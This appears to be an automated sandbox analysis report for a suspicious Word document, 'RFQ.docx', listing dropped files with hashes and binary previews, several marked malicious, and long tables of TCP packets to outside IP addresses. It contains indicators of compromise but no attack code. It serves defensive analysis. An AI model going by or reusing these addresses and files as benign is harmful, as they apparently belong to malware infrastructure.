                                                                                                SHA1:67995FB3FCB8EB2274732F20F17C54E1468F67CA
                                                                                                SHA-256:E6CC6F0C57A3E8A2720DDCC9BB55F2A34E1BC4C2A66A5B0E252DFDFF70BDF406
                                                                                                SHA-512:C58C0FCC5EC1FED08EC2036A121C091D5B137CA4C7EE414183B58C816427BB06E2703CCECFD907069BA862C1FC016A31B46BC445819B2F153477EC15DA6A601D
                                                                                                Malicious:false
                                                                                                Preview:[misc]..RFQ.LNK=0..[folders]..RFQ.LNK=0..

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                                Download File
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):162
                                                                                                Entropy (8bit):2.4797606462020307
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:vrJlaCkWtVyYyBS0JilXMWvk1c6nlln:vdsCkWtIJiRk3l
                                                                                                MD5:C4615A023DC40AFFAEAE6CF07410BB43
                                                                                                SHA1:AAE1D68C4082CABF6AEA71C7981F32928CE01843
                                                                                                SHA-256:103F860A912CF17B87A169B2768635758E8A0B82EB986A0C42FEA974F91BCB1E
                                                                                                SHA-512:CD6975EAE1DA934094AC2516D095D50F2EE311CF549C8AEA2F3D65074B0DFC2908F72703B46A4C012358817289C76B15AC0E39EE359BCF39A45A8C912DCB2AAD
                                                                                                Malicious:false
                                                                                                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                                C:\Users\user\Desktop\RFQ.docx (copy)

                                                                                                Download File
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                File Type:Microsoft Word 2007+
                                                                                                Category:dropped
                                                                                                Size (bytes):12502
                                                                                                Entropy (8bit):7.14561620805702
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:TDtmpXYy6o65bk8xgNAOvzGnzdWUuTG67axpvo1aolfqh/teB5:TDCXYy6oZ5v6nzdEG67azvotlfIYB5
                                                                                                MD5:F7109ADB6062A39E2636D19FE75FC0DE
                                                                                                SHA1:32991BAAFD0D251F13AFF79A097D30521954E6ED
                                                                                                SHA-256:7B928F05432D6D9EA95F52FD83AF6BEB4DAFCF5CDB8D6B32D9F8337A79CC36CE
                                                                                                SHA-512:55E6576366F200C05C492C07593C21D982C44611AD5752E0324FAF647CCC913B512D7C1169C18A25C1DF08A9552D733210167CC84C1D0352C655C3E64E735422
                                                                                                Malicious:true
                                                                                                Preview:PK..........!..$..............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................MO.@...&...W..z0.....M...C..~dg....JK...Z...2....3..J...<*kR.Oz,.#m..,e.....E...Di..l..F...t..#.6..".w.9.....:0t.[.E.[?.N..1.~...piM...Pi....r1/C4^...C.,.._..R&.+...H..d.\.CB..w.P.....V.......*.h"|x..0....gV.5....i.y.$4....V."e..9.B...A......)j....T(.y..>vw......v..(.SL...qW.U.DX...Q.w..4.S.^....0.F.."...\.gsld.Y.dL.uH........c.9.>(hVD.5..{.....A...7.t........PK..........!.........N......._rels/.rels ...(

                                                                                                C:\Users\user\Desktop\~$RFQ.docx

                                                                                                Download File
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):162
                                                                                                Entropy (8bit):2.4797606462020307
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:vrJlaCkWtVyYyBS0JilXMWvk1c6nlln:vdsCkWtIJiRk3l
                                                                                                MD5:C4615A023DC40AFFAEAE6CF07410BB43
                                                                                                SHA1:AAE1D68C4082CABF6AEA71C7981F32928CE01843
                                                                                                SHA-256:103F860A912CF17B87A169B2768635758E8A0B82EB986A0C42FEA974F91BCB1E
                                                                                                SHA-512:CD6975EAE1DA934094AC2516D095D50F2EE311CF549C8AEA2F3D65074B0DFC2908F72703B46A4C012358817289C76B15AC0E39EE359BCF39A45A8C912DCB2AAD
                                                                                                Malicious:true
                                                                                                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                                C:\Users\user\Desktop\~WRD0000.tmp

                                                                                                Download File
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                File Type:Microsoft Word 2007+
                                                                                                Category:dropped
                                                                                                Size (bytes):12502
                                                                                                Entropy (8bit):7.14561620805702
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:TDtmpXYy6o65bk8xgNAOvzGnzdWUuTG67axpvo1aolfqh/teB5:TDCXYy6oZ5v6nzdEG67azvotlfIYB5
                                                                                                MD5:F7109ADB6062A39E2636D19FE75FC0DE
                                                                                                SHA1:32991BAAFD0D251F13AFF79A097D30521954E6ED
                                                                                                SHA-256:7B928F05432D6D9EA95F52FD83AF6BEB4DAFCF5CDB8D6B32D9F8337A79CC36CE
                                                                                                SHA-512:55E6576366F200C05C492C07593C21D982C44611AD5752E0324FAF647CCC913B512D7C1169C18A25C1DF08A9552D733210167CC84C1D0352C655C3E64E735422
                                                                                                Malicious:false
                                                                                                Preview:PK..........!..$..............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................MO.@...&...W..z0.....M...C..~dg....JK...Z...2....3..J...<*kR.Oz,.#m..,e.....E...Di..l..F...t..#.6..".w.9.....:0t.[.E.[?.N..1.~...piM...Pi....r1/C4^...C.,.._..R&.+...H..d.\.CB..w.P.....V.......*.h"|x..0....gV.5....i.y.$4....V."e..9.B...A......)j....T(.y..>vw......v..(.SL...qW.U.DX...Q.w..4.S.^....0.F.."...\.gsld.Y.dL.uH........c.9.>(hVD.5..{.....A...7.t........PK..........!.........N......._rels/.rels ...(

                                                                                                C:\Users\user\Desktop\~WRD0000.tmp:Zone.Identifier

                                                                                                Download File
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:modified
                                                                                                Size (bytes):26
                                                                                                Entropy (8bit):3.95006375643621
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                Malicious:false
                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                Entropy (8bit):7.951902758473229
                                                                                                TrID:
                                                                                                • Word Microsoft Office Open XML Format document (27504/1) 77.45%
                                                                                                • ZIP compressed archive (8000/1) 22.53%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.02%
                                                                                                File name:RFQ.docx
                                                                                                File size:312'052 bytes
                                                                                                MD5:933dd0e0dd85baf5ac3c57fda0731637
                                                                                                SHA1:a37b19652dcd96f996c94bb44d9ba059b4cf9802
                                                                                                SHA256:cf5b221d161fbe82fd8cecb463d515b8469fc9dd05073eb3c3135b9823f571b0
                                                                                                SHA512:3d91d745d8667ac81523f227888747d3376cc110457d74c15c0a99e9298eb7ed60bac8f04796df2db791d51f3af3c01791c129cfcb4d68d680e2d959061b2dbc
                                                                                                SSDEEP:6144:U+oHyBv9MVR6CcttbVfEWJAxjdB5NDKx033i8QX0bUzqxz1:JoHo9+RSbauchNKxZFX0b6yz1
                                                                                                TLSH:D26412EEB45E2107CB349AB7E22A9459BE81213CA89EA831F4D7733E5240E1B55FF114
                                                                                                File Content Preview:PK..........*Y................_rels/PK........Q.iY................word/PK.........=.V..=.............[Content_Types].xml...N.0.._..+J.8 ......8..X........}{6-T*......v._..W;*.R....@Q4..8...yn.@q.h..H...a..7.L...y...|.5...r.2E......,..h>p"}.u...X).......i.

                                                                                                File Icon

                                                                                                Icon Hash:65e6a3a3afb7bdbf

                                                                                                Network Behavior

                                                                                                Network Port Distribution

                                                                                                TCP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Nov 11, 2024 10:03:21.614867926 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:21.614892006 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:21.614953995 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:21.672951937 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:21.672976017 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:22.634913921 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:22.634990931 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:22.642605066 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:22.642620087 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:22.642894983 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:22.851332903 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:22.851411104 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:22.922249079 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:22.963339090 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.152544022 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.295196056 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.295269966 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.295289993 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.295303106 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.295310974 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.295326948 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.295341969 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.295347929 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.295372009 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.295464039 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.437627077 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.437638998 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.437688112 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.437702894 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.437710047 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.437725067 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.437724113 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.437834978 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.437834978 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.437846899 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.439260006 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.439362049 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.439380884 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.439594030 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.439659119 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.439667940 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.440869093 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.581073046 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.581123114 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.581166029 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.581192970 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.581204891 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.581373930 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.722985983 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.723033905 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.723068953 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.723093033 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.723108053 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.746049881 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.864645958 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.864698887 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.864728928 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.864758968 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.864778042 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.865514994 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.865565062 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.865578890 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.865587950 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:23.865622997 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:23.887547970 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.006975889 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.007034063 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.007038116 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.007057905 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.007085085 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.007935047 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.007985115 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.007986069 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.007998943 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.008035898 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.041462898 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.152064085 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.152116060 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.152152061 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.152174950 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.152188063 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.152471066 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.152517080 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.152518034 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.152529955 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.152564049 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.153547049 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.153592110 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.153601885 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.153611898 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.153644085 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.174336910 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.292169094 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.292222023 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.292247057 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.292256117 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.292268991 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.293030977 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.293076992 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.293081045 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.293091059 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.293128967 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.293811083 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.293853998 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.293859005 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.293864965 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.293903112 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.419351101 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.434429884 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.434484959 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.434521914 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.434550047 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.434568882 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.435102940 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.435142040 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.435149908 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.435162067 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.435194969 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.435909986 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.435961962 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.435975075 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.647322893 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.647371054 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.664539099 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:24.894325972 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.894393921 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:24.894474030 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:25.072129965 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:25.072173119 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:03:25.072218895 CET49161443192.168.2.22153.121.40.91
                                                                                                Nov 11, 2024 10:03:25.072227001 CET44349161153.121.40.91192.168.2.22
                                                                                                Nov 11, 2024 10:04:28.680280924 CET4916280192.168.2.22154.23.184.218
                                                                                                Nov 11, 2024 10:04:28.685122967 CET8049162154.23.184.218192.168.2.22
                                                                                                Nov 11, 2024 10:04:28.685197115 CET4916280192.168.2.22154.23.184.218
                                                                                                Nov 11, 2024 10:04:28.693653107 CET4916280192.168.2.22154.23.184.218
                                                                                                Nov 11, 2024 10:04:28.698508024 CET8049162154.23.184.218192.168.2.22
                                                                                                Nov 11, 2024 10:04:29.496959925 CET8049162154.23.184.218192.168.2.22
                                                                                                Nov 11, 2024 10:04:29.696645975 CET8049162154.23.184.218192.168.2.22
                                                                                                Nov 11, 2024 10:04:29.696790934 CET4916280192.168.2.22154.23.184.218
                                                                                                Nov 11, 2024 10:04:29.698112011 CET4916280192.168.2.22154.23.184.218
                                                                                                Nov 11, 2024 10:04:29.702980995 CET8049162154.23.184.218192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.485723019 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:34.490668058 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.490755081 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:34.490911961 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:34.495837927 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.973723888 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.973752975 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.973773003 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.973789930 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.973793983 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:34.973810911 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:34.973814964 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.973825932 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.973843098 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.973853111 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:34.973870993 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:34.973880053 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:34.974466085 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.974478006 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.974489927 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.974513054 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:34.974526882 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:34.981012106 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.981056929 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:34.981101036 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.981113911 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:34.981137991 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:34.981151104 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:34.996376991 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.054717064 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.054728985 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.054789066 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.054836988 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.054851055 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.054862976 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.054876089 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.054876089 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.054889917 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.054913044 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.055480003 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.055496931 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.055499077 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.055531979 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.055543900 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.055907011 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.055917978 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.055954933 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.055957079 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.055968046 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.055969000 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.055979967 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.056004047 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.056020975 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.056780100 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.056792021 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.056802988 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.056835890 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.056852102 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.057257891 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.057270050 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.057281971 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.057296038 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.057307959 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.057308912 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.057332039 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.057343006 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.058094978 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.058145046 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.059737921 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.059748888 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.059794903 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.102533102 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.102547884 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.102560997 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.102591038 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.102617025 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.135961056 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.135973930 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.135986090 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.135998011 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.136008978 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.136022091 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.136028051 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.136034012 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.136042118 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.136068106 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.136068106 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.136127949 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.136164904 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.136172056 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.136204004 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.136204958 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.136248112 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.136248112 CET804916345.33.6.223192.168.2.22
